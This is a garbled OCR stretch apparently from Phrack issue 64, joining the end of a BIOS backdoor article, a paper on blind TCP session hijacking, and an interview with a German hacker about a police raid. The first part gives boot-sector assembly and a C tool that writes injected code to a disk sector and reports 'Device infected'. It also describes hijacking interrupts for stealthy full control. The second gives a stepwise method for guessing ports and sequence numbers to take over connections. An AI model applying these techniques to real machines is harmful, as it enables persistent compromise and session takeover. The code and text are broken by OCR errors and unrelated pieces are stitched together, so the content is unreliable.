jmp Ox1l00:next 


next: 7; to jump to the new location 
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7; load the true boot loader 
mov dl, [drive] 
mov ax, 0x07CO 
mov es, ax 
mov bx, 0 
mov ah, 2 
mov al, 2 
mov eh, -0 
mov cl; 2 
mov dh, 0 
int 0x13 
7; Go your evil stuff there (ie : infect the boot loader) 
nop 
nop 
nop 


jj; execu 


jmp 


equ 


Sif sizet2 > 512 


Sendif 


times 
db 


Serror " 


(512 - s 


te system 
O07COh:0 
S$ -— entry 


code is too large for boot sector" 


ize - 2) db 0 ; fill 512 bytes 


0x55, OxAA ; boot signature 


** code to be used to store a fake bootloader loaded by an infected BIOS 


** usage 


** compi 


include 
include 
include 
include 


define 
define 


void 


is 


le with 


<stdio. 


<stdlib. 
<unistd. 


<fcntl. 


CODE_SIZ 


store <device to store on> <sector number> <file to inject> 


gcc store.c -o store 


E 512 


SECTOR_S 


usage (ch 


IZE 512 


E 


ar *cmd) 


fprintf(stderr, "usage is : %s <device> <sector> <code>", cmd); 


exit (0 


int 
int 
char 


if (ar 


i 


main(int 


off; 

i; 
devfd; 
codefd; 
ent; 


code [CODE_SIZE 


argc, char **argv) 


5 


7] 
— 
x 


gc != 4) 
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usage (argv[0]); 


if ((devfd = open(argv[1], O_RDONLY)) == -1) 
{ 
fprintf(stderr, "error : could not open device\n"); 
exit(1); 
} 
off = atoi(argv[2]); 
if ((codefd = open(argv[3], O_RDONLY)) == -1) 
{ 
fprintf(stderr, "error : could not open code file\n"); 
exit(l1); 
} 
for (cnt = 0; cnt != CODE_SIZE; cnt += i) 
if ((i = read(codefd, &(mbr[cnt]), CODE_SIZE - cnt)) <= 0) 


{ 


fprintf(stderr, "error reading code\n"); 


exit(1); 
} 
lseek(devfd, (off - 1) * SECTOR_SIZE, SEEK_SET); 
for (cnt = 0; cnt != CODE_SIZE; cnt += i) 
if ((i = write(devfd, &(mbr[cnt]), CODE_SIZE - cnt)) <= 0) 


{ 
fprintf(stderr, "error reading code\n"); 
exit(l1); 
} 
close (devfd) ; 
close (codefd) ; 
printf ("Device infected\n") ; 
return 0; 


Okay, now that we can load our code using the BIOS, time has come 
to consider what we can do in this position. As we are nearly the first one 
to have control over the system, we can do really interesting things. 


First, we can hijack BIOS interruptions and make them jump to 
our code. This is interesting because instead of writing all the code in 
the BIOS, we can now hijack BIOS routines having as much space as we need 
and without having to do a lot of revers ngineering. 


Next, we can easily patch the boot loader on-thy-fly as it is our 
own code which loads it. In fact, we don’t even have to call the true 
boot loader if we don’t want to, we can make a fake one that loads a nicely 
patched kernel based on the real one. Or you can make a fake boot loader 
(or even patch the real one on-the-fly) that loads the real kernel and 
patch it on the fly. The choice is up to you. 


Finally, I would talk about one last thing that came on my mind. 
Combined with IDTR hijacking, patching the BIOS can assure us a complete 
control of the system. We can patch the BIOS so that it loads our own boot 
loader. This boot loader is a special one, in fact it loads a mini-OS of 
our own which sets an IDT. Then, as we hijacked the IDTR register (ther 
are several ways to do it, the easiest being patching the target OS boot 
process in order to prevent him to erase our IDT), we can then load the 
true boot loader which will load the true kernel. At this time, our own os 
will hijack th ntire system with its own IDT proxying any interrupt you 
want to, hijacking any event on the system. W ven can use the system 
clock as a scheduler forthe two OS : the tick will be caught by our own 
OS and depending the configuration (we can say for example 10% of the time 
for our OS and 90% for the real OS), we can execute our code or give the 
control to the real OS by jumping on its IDT. 


You can do lot of things simply by patching the BIOS, so I suggest 
you to implement your own ideas. Remember this is not so difficult, 
documentation about this subject already exists and we can really do lots 
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of things. Just remember to use Bochs for tests before going in the wild, 
it certainly isn’t fun when smoke comes out of one of the motherboard’s 
chips... 


5. Conclusion 


So that’s it, hardware can be backdoored quite easily. Of course, 
what I demonstrated here was just a fast overview. We can do LOTS of things 
with hardware, things that can assure us a total control of the computer 
we’re on and remain stealth. There is a huge work to do in this area as 
more and more devices become CPU independent and implement many features 
that can be used to do funny things. Imagination (and portability, sic...) 
are the only limits. 


For people very interested in having fun in the hardware world, I 
suggest to take a look at CPU microcode programming system 
(start with the AMD K8 revers ngineering, see [18]), network cards 
BIOSes and the PXE system. 


(And hardware hacking can be a fun start to learn to fuck the TCPA system). 
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--{ 1 - Introduction 


Fun with TCP (blind spoofing/hijacking, etc...) was very popular several 

years ago when the initials TCP sequence numbers (ISN) were guessable (64K rule, 
etc...). Now that the ISNs are fairly well randomized, this stuff seems to be 
impossible. 


In this paper we will show that it is still possible to perform blind TCP 
hijacking nowadays (without attacking the PRNG responsible for generating 

the ISNs, like in [1]). We will present a method which works against a number 
of systems (Windows 2K, windows XP, and FreeBSD 4). This method is not really 
straightforward to implement, but is nonetheless entirely feasible, as we’ve 
coded a tool which was successfully used to perform this attack against all 
the vulnerable systems. 


[.2 Prerequisites 


In this section we will give some informations that are necessary to 
understand this paper. 


----[ 2.1 - A brief reminder on TCP 


A TCP connection between two hosts (which will be called respectively 
"client" and "server" in the rest of the paper) can be identified by a tuple 


[client-IP, server-IP, client-port, server-port]. While the server port is 
well known, the client port is usually in the range 1024-5000, and 
automatically assigned by the operating system. (Exemple: the connection 


from some guy to freenode may be represented by [ppp289.someISP.com, 
irc.freenode.net, 1207, 6667]). 


When communication occurs on a TCP connexion, the exchanged TCP packet 
headers are containing these informations (actually, the IP header contains 
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the source/destination IP, and the TCP header contains the 
source/destination port). Each TCP packet header also contains fields for a 
sequence number (SEQ), and an acknowledgement number (ACK). 


Each of the two hosts involved in the connection computes a 32bits SEQ 
number randomly at the establishment of the connection. This initial SEQ 
number is called the ISN. Then, each time an host sends some packet with 

N bytes of data, it adds N to the SEQ number. 

The sender put his current SEQ in the SEQ field of each outgoing TCP packet. 
The ACK field is filled with the next *expected* SEQ number from the other 
host. Each host will maintain his own next sequence number (called 

XT), and next expected SEQ number from the other host (called 

XT). 


Let’s clarify with an exemple (for the sake of simplicity, we consider that 
the connection is already established, and the ports are not shown.) 


Client Server 
SND .NEXT=1000] [SND .NEXT=2000] 
—-[SEQ=1000, ACK=2000, size=20]-> 
SND .NEXT=1020] [SND .NEXT=2000] 
<-[SEQ=2000, ACK=1020, size=50]-- 
SND .NEXT=1020] [SND .NEXT=2050] 
—-[SEQ=1020, ACK=2050, size=0]-> 


In the abov xample, first the client sends 20 bytes of data. Then, the 
server acknowledges this data (ACK=1020), and send its own 50 bytes of data 
in the same packet. The last packet sent by the client is what we will call 
a "Simple ACK". It acknowledges the 50-bytes data sent by the server, but 
carry no data payload. The "simple ACK" is used, among other cases, where a 
host acknowledge received data, but has no data to transmit yet. Obviously, 
any well-formed "simple ACK" packet will not be acknowledged, as this would 
lead to an infinite loop. Conceptually, each byte has a sequence number, 
it’s just that the SEQ contained in the TCP header field represents the 
sequence number of the first byte. For example, the 20 bytes of the first 
packet have sequence numbers 1000..1019. 


TCP implements a flow control mechanism by defining the concept of "window". 
Each host has a TCP window size (which is dynamic, specific to each TCP 
connection, and announced in TCP packets), that we will call RCV.WND. 


At any given time, a host will accept bytes with sequence number 
between RCV.NXT and (RCV.NXT+RCV.WND-1). This mechanism ensures that at any 
tyme, there can be no more than RCV.WND bytes "in transit" to the host. 


The establishment and teardown of the connection is managed by flags in the 
TCP header. The only useful flags in this paper are SYN, ACK, and RST (for 
more information, see RFC793 [2]). The SYN and ACK flags are used in the 
connection establishment, as follows: 


Client Server 


client picks an ISN] 


SND .NEXT=5000] 
—-[flags=SYN, SEQ=5000]--> [server picks an ISN] 

SND .NEXT=5001] [SND .NEXT=9000] 
<-[flags=SYN+ACK, SEQ=9000, ACK=5001]-- 

SND .NEXT=5001] [SND .NEXT=9001] 
—-[flags=ACK, SEQ=5001, ACK=9001]--> 


.connection established... 


You’1ll remark that during the establishment, the SND.NEXT of each hosts is 
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incremented by 1. That’s because the SYN flag counts as one (virtual) byte, 

as far as the sequence number is concerned. Thus, any packet with the SYN 

flag set will increment the SND.NEXT by l+tpacket_data_size (here, the data size 
is 0). You’11l also note that the ACK field is optional. The ACK field is not 

to be confused with the ACK flag, even if they are related: The ACK flag is 

set if the ACK field exists. The ACK flag is always set on packets beloning 

to an established connection. 


The RST flag is used to close a connection abnormally (due to an error, for 
example a connection attempt to a closed port). 


---- [ 2.2 - The interest of the IP ID 


The IP header contains a flag named IP_ID, which is a 16-bits integer used by 
the IP fragmentation/reassembly mechanism. This number needs to be unique 

for each IP packet sent by an host, but will be unchanged by fragmentation 
(thus, fragments of the same packet will have the same IP ID). 


Now, you must be wondering why the IP_ID is so interesting? Well, there’s a 
nifty "feature" in some TCP/IP stacks (including Windows 98, 2K, and XP) 
these stacks store the IP_ID in a global counter, which is simply incremeted 
with each IP packet sent. This enables an attacker to probe the IP_ID 
counter of an host (with a ping, for exemple), and so, know when the host is 
sending packets. 


Exemple: 


[ 


attacker Host 
—-[PING]-> 
<-[PING REPLY, IP_ID=1000]-- 


wait a little 


—- [PING] -> 
<-[PING REPLY, IP_ID=1010]-- 


<attacker> Uh oh, the Host sent 9 IP packets between my pings. 


[ 


This technique is well known, and has already been exploited to perform 
really stealth portscans ([3] and [5]). 


----[ 2.3 - List of informations to gather 
Well, now, what we need to hijack an existing TCP connection? 


First, we need to know the client IP, server IP, client port, and server 
port. 

In this paper we’ll assume that the client IP, server IP, and server port 
are known. The difficulty resides in detecting the client port, since it is 
randomly assigned by the client’s OS. We will see in the following section 
how to do that, with the IP_ID. 


The next thing we need if we want to be able to hijack both ways (send data 
to client from the server, and send data from server to client) is to know 
the sequence number of the server, and the client. 


Obviously, the most interesting is the client sequence number, because it 
enables us to send data to the server that appears to have been sent by the 
client. But, as the rest of the paper will show, we’ll need to detect the 
server’s sequence number first, because we will need it to detect the 
client’s sequence number. 
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--[ 3 - Attack description 


In this section, we will show how to determine the client’s port, then the 
server’s sequence number, and finally the client’s sequence number. We will 
consider that the client’s OS is a vulnerable OS. The server can run on any 
OSs. 


----[ 3.1 - Finding the client-port 


Assuming we already know the client/server IP, and the server port, there’s 
a well known method to test if a given port is the correct client port. 

In order to do this, we can send a TCP packet with the SYN flag set to 
server-IP:server-port, from client-IP:guessed-client-port (we need to be 
able to send spoofed IP packets for this technique to work). 


Here’s what will happen when we send our packet if the guessed-client-port 
is NOT the correct client port: 


[ ] 


Attacker (masquerading as client) Server 


—-[flags=SYN, SEQ=1000]-> 


Real client 


<-[flags=SYN+ACK, SEQ=2000, ACK=1001]-- 
the real client didn’t start this connection, so it aborts with RST 


—-[flags=RST]-> 


Here’s what will happen when we send our packet if the guessed-client-port 
IS the correct client port: 


[ ] 


Attacker (masquerading as client) Server 


—-[flags=SYN, SEQ=1000]-> 


Real client 


upon reception of our SYN, the server replies by a simple ACK 


<-[flags=ACK, SEQ=xxxx, ACK=yyyy]-- 


the client sends nothing in reply of a simple ACK 


Now, what’s important in all this, is that in the first case the client 

sends a packet, and in the second case it doesn’t. If you have carefully 
read the section 2.2, you know this particular thing can be detected by 

probing the IP ID counter of the client. 


So, all we have to do to test if a guessed client-port is the correct on 
S's 


-— Send a PING to the client, note the IP ID 

—- Send our spoofed SYN packet 

— Resend a PING to the client, note the new IP ID 

— Compare the two IP IDs to determine if the guessed port was correct. 


Obviously, if one want to make an efficient scanner, there’s many 
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difficulties, notably the fact that the client may transmit packets on his 

own between our two PINGs, and the latency between the client and the server 
(which affects the delay after which the client will send his RST packet in 
case of an incorrect guess). Coding an efficient client-port scanner is left as 
an exercise to the reader :). With our tool - which measures the latency 

before the attack and tries to adapt itself to the client’s traffic in 
real-tim the client-port is usually found in less than 3 minutes. 


----[ 3.2 - Finding the server’s SND.NEXT 


Now that we (hopefully :)) have the client port, we need to know the 
server’s SND.NEXT (in other words, his current sequence number). 


Whenever a host receive a TCP packet with the good source/destination ports, 

but an incorrect seq and/or ack, it sends back a simple ACK with the correct 

SEQ/ACK numbers. Before we investigate this matter, let’s defin xactly what 
is a correct seq/ack combination, as defined by the RFC793 [2]: 


A correct SEQ is a SEQ which is between the RCV.NEXT and (RCV.NEXT+RCV.WND-1) 
of the host receiving the packet. Typically, the RCV.WND is a fairly large 
number (several dozens of kilobytes at last). 


A correct ACK is an ACK which corresponds to a sequence number of something 
the host receiving the ACK has already sent. That is, the ACK field of the 
packet received by an host must be lower or equal than the host’s own 

current SND.SEQ, otherwise the ACK is invalid (you can’t acknowledge data that 
were never sent!). 


It is important to node that the sequence number space is "circular" 

For exemple, the condition used by the receiving host to check the ACK validity 
is not simply the unsigned comparison "ACK <= receiver’s SND.NEXT", 

but the signed comparison "(ACK -— receiver’s SND.NEXT) <= 0". 


Now, let’s return to our original problem: we want to guess server’s 
SND.NEXT. We know that if we send a wrong SEQ or ACK to the client from the 
server, the client will send back an ACK, while if we guess right, the 
client will send nothing. As for the client-port detection, this may be 
tested with the IP ID. 


If we look at the ACK checking formula, we note that if we pick 

randomly two ACK values, let’s call them ackl and ack2, such as 

jJackl-ack2| = 2%31, then exactly one of them will be valid. For example, let 
ack1=0 and ack2=2%31. If the real ACK is between 1 and 2%31 then the ack2 
will be an acceptable ack. If the real ACK is 0, or is between (2%32 - 1) 
and (2%31 + 1), then, the ackl will be acceptable. 


Taking this into consideration, we can more easily scan the sequence number 
space to find the server’s SND.NEXT. Each guess will involve the sending of 

two packets, each with its SEQ fiel A set to the guessed server’s SND.NEXT. The 
first packet (resp. second packet) will have his ACK field set to ackl 

(resp. ack2), so that we are sure that if the guessed’s SND.NEXT is correct, at 
least one of the two packet will be accepted. 


The sequence number space is way bigger than the client-port space, but two 
facts make this scan easier: 


First, when the client receive our packet, it replies immediately. There’s 
not a problem with latency between client and server like in the client-port 
scan. Thus, the time between the two IP ID probes can be very small, 
speeding up our scanning and reducing greatly the odds that the client will 
have IP traffic between our probes and mess with our detection. 


Secondly, it’s not necessary to test all the possible sequence numbers, 
because of the receiver’s window. In fact, we need only to do approx. 
(2°32 / client’s RCV.WND) guesses at worst (this fact has already been 
mentionned in [6]). Of course, we don’t know the client’s RCV.WND. 
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We can take a wild guess of RCV.WND=64K, perform the 

scan (trying each SEQ multiple of 64K). Then, if we didn’t find anything, 
wen can try all SEQs such as seq = 32K + i*64K for all i. Then, all SEQ such 
as seq=16k + i*32k, and so on... narrowing the window, while avoiding to 
re-test already tried SEQs. On a typical "modern" connection, this scan 
usually takes less than 15 minutes with our tool. 


With the server’s SND.NEXT known, and a method to work around our ignorance 
of the ACK, we may hijack the connection in the way "server -> client". This 
is not bad, but not terribly useful, we’d prefer to be able to send data 
from the client to the server, to make the client execute a command, etc... 
In order to do this, we need to find the client’s SND.NEXT. 


----[ 3.3 - Finding the client’s SND.NEXT 


What we can do to find the client’s SND.NEXT ? Obviously we can’t use the 
same method as for the server’s SND.NEXT, because the server’s OS is 
probably not vunerable to this attack, and besides, the heavy network 
traffic on the server would render the IP ID analysis infeasible. 


However, we know the server’s SND.NEXT. We also know that the client’s 
SND.NEXT is used for checking the ACK fields of client’s incoming packets. 
So we can send packets from the server to the client with SEQ field set to 
server’s SND.NEXT, pick an ACK, and determine (again with IP ID) if our ACK 
was acceptable. 


If we detect that our ACK was acceptable, that means that 
(guessed_ACK -— SND.NEXT) <= 0. Otherwise, it means... well, you guessed it, 
that (guessed_ACK - SND_NEXT) > 0. 


Using this knowledge, we can find the exact SND_NEXT in at most 32 tries 
by doing a binary search (a slightly modified one, because the sequenc 
space is circular). 


Now, at last we have all the required informations and we can perform the 
session hijacking from either client or server. 


--[{ 4 - Discussion 


In this section we’ll attempt to identify the affected systems, discuss 
limitations of this attacks, present similar attacks against older systems. 


soso [ 4y1 Vulnerable systems 


This attack has been tested on Windows 2K, Windows XP <= SP2, and FreeBSD 4. 
It should be noted that FreeBSD has a kernel option to randomize the IP ID, 
which makes this attack impossible. As far as we know, there’s no fix for 
Windows 2K and XP. 


The only "bug" which makes this attack possible on the vulnerable systems is 
the non-randomized IP ID. The other behaviors (ACK checking that enables us 


to do a binary search, etc...) are expected by the RFC793 [2] (however, there’s 


been work to improve these problems in [4]). 


It’s interesting to see that, as far as we could test, only Windows 2K, 
Windows XP, and FreeBSD 4 were vulnerable. There’s other OS which use the 
same IP ID incrementation system, but they don’t use the same ACK checking 
mechanism. Hmm.. this similarity between Windows’s and FreeBSD’s TCP/IP 
stack behavior is troubling... :) MacOS X is based on FreeBSD but is not 
vulnerable because it uses a different IP ID numbering scheme. Windows Vista 
wasn’t tested. 


----[ 4.2 - Limitations 


The described attack has various limitations: 


First, the attack doesn’t work "as is" on Windows 98. That’s not really a 


13.txt Wed Apr 26 09:43:45 2017 7 


limitation, because the initial SEQ of Windows 98 is equal to the uptime of 
the machine in milliseconds, modulo 2%32. We won’t discuss how to do 
hijacking with Windows 98 because it’s a trivial joke :) 


Secondly, the attack will be difficult if the client has a slow connection, 
or has a lot of traffic (messing with the IP ID analysis). Also, there’s the 
problem of the latency between the client and the server. These problems can 
be mitigated by writing an intelligent tool which measures the latency, 
detects when the host has traffic, etc... 


Furthermore, we need access to the client host. We need to be able to send 
packets and receive replies to get the IP ID. Any type of packet will do, ICMP 
or TCP or whatever. The attack will not be possible if the host is behind a 
firewall/NAT/... which blocks absolutely all type of packets, but 1 

unfiltered port (even closed on the client) suffices to make the attack 
possible. This problem is present against Windows XP SP2 and later, which 
comes with an integrated firewall. Windows XP SP2 is vulnerable, but the 
firewall may prevent the attack in some situations. 


-—-[ 5 -— Conclusion 


In this paper we have presented a method of blind TCP hijacking which works 
on Windows 2K/XP, and FreeBSD 4. While this method has a number of 
limitations, it’s perfectly feasible and works against a large number of 
hosts. Furthermore, a large number of protocols over TCP still use 
unencrypted communication, so the impact on security of the blind TCP 
hijacking is not negligible. 
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_/B\_ _/W\_ 

(* *) Phrack #64 file 10 Ce) 

ord or 

| | Know your enemy : facing the cops | 

| | | | 

| | By Lance | 

| | | | 

| | | | 
) 


The following article is divided into three parts. The first and 
second part are interviews done by The Circle of lost Hackers. The 
people interviewed are busted hackers. You can learn, through their 
experiences, how cops are working in each of their country. The last 
part of this article is a description about how a Computer Crime Unit 
proceeds to bust hackers. We know that this article will probably help 
more policemen than hackers but if hackers know how the cops proceed 
thay can counter them. That’s the goal of this article. 


Have a nice read. 


(Hi Lance! :;) 


Willy’s interview 


<THE CIRCLE OF LOST HACKERS> Hi WILLY, can you tell us who are you, 
what’s your nationality, and what’s your daily job ? 


hi. i’m from germany. i actually finished law school. 


<THE CIRCLE OF LOST HACKERS> QUESTION: Can you tell us what kind of 
relationship you’re having with the police in your country ? In some other 
European country, the law is hardening these days, what about germany ? 


Well, due to the nature of my finished studies, I can view the laws 

from a professional point. The laws about computer crime did not change 
since years. so you cant s they are getting harder. What we can say is, 
that due to 9/11/01, some privacy laws got stricter 


<THE CIRCLE OF LOST HACKERS> QUESTION: Can you explain us what kind of 
privacy laws got stricter ? 


Yeah. for example all universities have to point students that are 
muslims, between 20/30, not married, etc. so police can do a screen 
search. Some german courts said this is illegal, some said not. the 
process is on-going, but the screen searches didnt have much results 
yet. On the other hand, we have pretty active privacy-protection people 
("datenschutzbeauftragte") which are trying to get privacy a fundamental 
right written in the constitution. So, the process is like we have 
certain people who want a stricter privacy law, e.g. observation due to 
video-cameras on public places. (which does happen already somewhere) . 
But, again, we have active people in the cuntry who work against these 
kind of observation methods. its not really decided if the supervision 
is getting stronger. What is getting stronger are all these DNA-tests now 
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for certain kind of crimes, but its still not the way that any convicted 
person is in a DNA database - luckly. 


<THE CIRCLE OF LOST HACKERS> QUESTION: Do you have the feeling that 
Computer related law is stricter since 09/11/01 ? 


Definitly not. 


<THE CIRCLE OF LOST HACKERS> QUESTION: Are these non-computer related 
enforcements happened since the schroeder re-election ? 


Nope. thes nforcements ("Sicherheitspaket") happened after 9/11. the 
re-election of schroeder had nothing to do with enforcements. On 

one hand, ISP’s have to keep the logfiles of dial-in IP’s for 90 

days. but federal ministry of economics and technology is supporting 


a project called "JAP" (java annonymous proxy) to realize anonymous 
unobservable communication. I dont know in details, but I’m pretty 
sure the realisation of JAP is not ok with the actualy laws in germany, 


because you can surf really completely anonymously with JAP. this is not 
corresponding with the law to keep the logfiles. i dont know. from my 
point of view, eventhough i (of course) like JAP, it is not compatible 
with current german law. but its support by a federal ministry. thats 
pretty strange i think. well, we’ll see. You can get information about 
this on http://anon.inf.tu-dresden.de/index_en.html 


<THE CIRCLE OF LOST HACKERS> QUESTION: now that we know a bit more about 
the context, can you explain us how you get into hacking, and since when 
you are involved in the scene ? 


Well, how did i get contact to the scene? i guess it was a way pretty 
much people started. i wanted to have the newest games. so I talked to 
some older guys at my school, and they told me to get a modem and call 
some BBS. This was i guess 1991. you need to know that my hometown 
Berlin was pretty active with BBS, due to a political reason : local 
calls did only cost 23pf. That was a special thing in west-berlin / 
cold-war. I cant remember when it was abolished. but, so there amyn many 
BBS in berlin due to the low costs. Then, short time after, i got in 
contact with guys who always got the newest stuff from USA/UK into the 
BBS, and i though. "wham, that must b xpensive" it didnt take a long 
time untill i found out that there are ways to get around this. Also, 

I had a local mentor who introduced me to blueboxing and all the neat 
stuff around PBX, VMBS and stuff. 


<THE CIRCLE OF LOST HACKERS> QUESTION: when did you start to play with 
TCP/IP network ? 


I think that was pretty late. i heard that some of my oversea friends 
had a new way of chatting. no chat on BBS anymore, but on IRC. I guess 
this was in 1994. So, i got some informations, some accounts on a local 
university, and i only used "the net" for irc’ing. 


<THE CIRCLE OF LOST HACKERS> QUESTION: When (and why) did you get into 
troubles for the first time, 


Luckly, i only got into trouble once in 1997. I got a visit from four 
policemen (with weapons), who had a search warrent and did search my 
house. I was accused for espionage of data. thats how they call hacking 
here. They took all my equipment and stuff and it took a long time untill 
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i heard of them again for a questionning . I was at the police several 
times. first time, I think after 6 month, was due to a meeting with the 
attorny at state and the policemen. This was just a meeting to see if 
they can use my computer stuff as prove. It was like they switched the 
computer on, the policemen said to the attorney "this could be a log file" 
and the attorny said "ok this might be a prove". this went for all cd’s 
and at least 20 papers with notes. ("this could be an IP adress". "this 
c 
a 
a 


ould be a l/p, etc . Of course, the attorney didnt have much knowledge, 
nd i lost my notes with phone numbers on it ("yeah, but it could be 

n IP") . However, this was just a mandatory meeting because I denied 
anything and didnt allow them to use any of the stuff, so there has to 

be a judge or an attorney to see if the police took things that can be a 
prove at all. The second time I met them was for the crimes in question. I 
was there for a questioning (more than 2 years after the raid, and almost 
3 years after the actualy date where i should have done the crime) 


<THE CIRCLE OF LOST HACKERS> QUESTION: How long did you stay at the 
police station just after your first perquisition ? 


First time, that was only 15 minutes. It was really only to see if the 
police took the correct stuff. e.g. if they had taken a book, I would 
have to get it back. because a book cant have anything to do with my 
accused crime. (except i had written IP numbers in that book, hehe) 


<THE CIRCLE OF LOST HACKERS> QUESTION: what about the crime itself ? Did 
you earn money or make peopl ffectively loose money by hacking ? 


No, i didnt earn any money. it was just for fun, to learn, and to see 
how far you can push a border. see what is possible, whats not. People 
didnt loose any money, too. 


5 


<THE CIRCLE OF LOST HACKERS> QUESTION: How did they find you ? 


I still dont really know how they found me. the accused crime was (just) 
the unauthorized usage of dial-in accounts at one university. Unluckly, 
it was the starting point of my activities, so was a bit scared at 
first. You have to dial-in somwhere, if if that facility buists you, 

it could have been pretty bad. At the end, after the real questioning 
and after i got my fine, they had to drop ALL accuses of hacking and i 
was only guilty for having 9 warez cd’s) 


<THE CIRCLE OF LOST HACKERS> QUESTION: were you dialing from your home ? 


Yeah from my home. but i didnt use ISDN or had a caller ID on my analoge 
line, and it is not ok to tap a phone line for such a low-profile crime 
like hacking here in germany . So, since all hacking accuses got dropped, 
I didnt see what evidence they had, or how they get me at all. 


<THE CIRCLE OF LOST HACKERS> QUESTION: Can you tell more about the 
policemen ? WHat kind of organisation did bust you ? 


It was a special department for computer crime organzied from the state 
police, the "landeskriminalamt" LKA. They didnt know much about computers 
at all i think. They didnt find all logfiles I had on my computer, they 
didnt find my JAZ disks with passwd files, they didnt find passwd files 
on my comp., etc 
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<THE CIRCLE OF LOST HACKERS> QUESTION: Where did they bring u after 
beeing busted at the raid, and the second time for the interview ? 


After the raid, I could stay at home ! For the interview, I went the 
headquater of the LKA, into the rooms of the computer crime unit. simple 
room with one window, a table & chair, and a computer where the policemen 
himself did type what he asked, and what i answered. 


<THE CIRCLE OF LOST HACKERS> QUESTION: have you heard interresting 
conversation between cops when you were in there ? 


hehe nope. not at all. and, of course, the door to the 

questioning room was closed when i was questioned. so i couldnt 

hear anything else . I have been interviewed by only one guy from 
"polizeihauptkommisar", no military grade, only a captain like explained 
in http://police-badges.de/online/sammeln/us-polizei.html 


Another thing about the raid: they did ring normally, nothing with 
bashing the door. if my mother hadnt opened the door, i had enough time 
to destroy things. but unluckly, as most germans, she did open the door 
when she heard the word "police" hehe. 


I didnt not have a trial, 1 accepted a "order of summary punishment" this 
is the technical term i looked up in the dictonary :-) This is something 
that a judge decides after he has all information. he can open a trial 

or use this order of summary punishment. they mail it you you, and if 

you dont say "no, i deny" within one week, you accpeted it :-) When you 
deny it, THEN you definitly decide to go to court and have a trial 


<THE CIRCLE OF LOST HACKERS> QUESTION: do you advise hackers to accept 


You cant generally give an advice about that. in my case, i found it 
important that i do not have any crime record at all and that i count 
as "first offender" if i ever have a trial in the future. so with that 
accpetion of the summary, i knew what i get, which was acceptable for 
my case. if you go to court, you can never know if the fine will be 
much higher. but you cant generalize it. if its below "90 tagessaetze" 
(--> over 90 you get a crime recoard), i guess i would accept it, but 
again, better go to a lawyer of your trust :-) 


<THE CIRCLE OF LOST HACKERS> QUESTION: can you compare LKA with an 
american and/or european organisation ? What is their activity if their 
are not skilled with computers ? 


Mmmm every country within germany has its special department called LKA. 
Its not like the FBI (that would be BKA), but it would be like a state 

in the usa, say florida, has a police department for whole florida 

hich does all the special stuff, like organzied crime. Computer crime 

n germany belongs to economic crime, and therefore, the normal police 
snt the correct department, but the LKA. By the way, I heard from 
ifferent people that they are more skilled now. but at that time, I 

hink only one person had an idea about UNIX at all. I know that the BKA 
as a special department for computer crime, because a friend of mine got 
isited by the BKA, but, most computer crime departments here are against 
hild-porn. I dont think that too many people get busted for hacking in 
ermany at all. they do bust child porn, they do bust warez guys, they 

o bust computer fraud, related to telco-crimes. but hacking, I dont 

now lots of people who had problems for real hacking. except one guy 


FQaQQqagacT,tQabrrsz 
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<THE CIRCLE OF LOST HACKERS> QUESTION: is there special services in your 
country who are involved in hacking ? 


Special services ? what do you mean? like CIA ? hehe ?! We hav 

BND (counter-spying), MAD (military spying), verfassungsschutz 
(inland-spying), but I dont think we a service that is concentrating 
on computer crime. What we do have is a lot of NSA (echelon) stations 
from the US. I guess because of the cold war, we’re still pretty much 
under the supervision of these services :-) so the answer is: we dont 
have such services, or they do work so secret that noone knows, but i 
doubt this in germany hehe. 


<THE CIRCLE OF LOST HACKERS> QUESTION: Except for the crime they inculped 
you, did you have any relations with the police ? (phone calls, non 
related interview, job proposition) ? 


Hehe, no, not at all. 


<THE CIRCLE OF LOST HACKERS> QUESTION: what kind of information was 
the police asking you during your interview ? Were they asking non 
crime-related information ? (like: who are you chilling with, etc ?) 


Yeah, that was the part they where most interested in ! They had 
printed my /etc/passwd and said "thats your nick, right?" . I didnt say 
anything to that whole complex, but they continued, and I mean, if you 
have one user in your /etc/passwd, it is pretty easy to guess thats 
your nick. So, they had searched the net for that nick, they found a 
page maintained by some hackers who formed some kind of crew. they had 
printed the whole website of that crew, pointing out my name anywhere 
where it appeared. They tried to play the good-cop game, the "you’re that 
cool dude ther h?" etc. I didnt say anything again. It took several 
minutes, and they wanted to pin-point me that i’m using this nick they 
found in /etc/passwd and that i am a member of that group which they 
had the webpage printed. They knew that there was a 2nd hacker at that 
university. They asked me all the time if i know him. I dont know why 
he had more luck. of course i did know him, it was my mate with whom i 
did lots of the stuff together. 


<THE CIRCLE OF LOST HACKERS> QUESTION: You didnt say anything ? How did 
they accepted this ? 


hehe. they had to accept it. i think thats in most countries that, if 
you are accused, you have the right to say nothing. I played an easy 
game: I accepted to have copied the 9 cd’s. because the cd’s are prove 
enough at all, then the cops where happy. I didnt say anything to that 
hacking complex, which was way more interesting for them. I though "I 
have to give them something, if I dont want to go before court" . I said 
"I did copy that windows cd" so they have at least something. 


<THE CIRCLE OF LOST HACKERS> QUESTION: did you feel some kind of evolution 
in your relation with police ? Did they try to be friend with you at 
some point ? 


yeah, they did try to be friend at several stages. 


a) At the raid. my parents where REALLY not amuzed, i think you can 

imagine that. having policemen sneaking through your cloth, your bedroom, 

etc. So, they noticed my mom was pretty much nervous and "at the end" 
They said "make it easy for your mother, be honest, be a nice guy, 
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its the first time, tell us something ..." (due to my starting law 
school at that time, I, of course knew that its the best thing to stay 
calm and say nothing.) 


b) At the questioning, of course. after I admitted the warez stuff, 

they felt pretty good, which was my intention. they allowed me to smoke, 
and stuff like that. when it came to hacking, and i didnt say anything, 
They continued to be "my friend", and tried to convince me "thats its 
easier and better if i admit it, becaus veidence is so high" . They 
where friendly all the time, yeah. 


<THE CIRCLE OF LOST HACKERS> QUESTION: What do you think they were really 
knowing ? 


They definitly knew I used unauthorized dial-in accounts at that 
university, they knew I was using that nick, and that I am a member of 
that hacking group (nothing illegal about that, though) . I was afraid 
that they might know my real activities, because, again, that university 
was JUST my starting point, so all i did was using accounts i shouldnt 
use. Thats no big deal at all, dial-ins. but i didnt know what they knew 
about the real activities after the dial-in, so i was afraid that they 
know more about this. 


<THE CIRCLE OF LOST HACKERS> QUESTION: did they know personnal things 
about the other people in your hacking group ? 


nope, not at all. 


<THE CIRCLE OF LOST HACKERS> QUESTION: How skilled are the forensics 
employed by german police in 2002 ? 


huh, i luckly dont know. I read that they do have some forensic 

experts at the BKA, but the usually busting LKA isnt very skilled, in my 
opinion. they have too less people to cover all the computer crimes. they 
work on low money with old equipment. and they use much of their time 

to go after kiddie-porn. 


<THE CIRCLE OF LOST HACKERS> QUESTION: how does the police perceived 
your group ? (front-side german hacking group you guyz all know) 


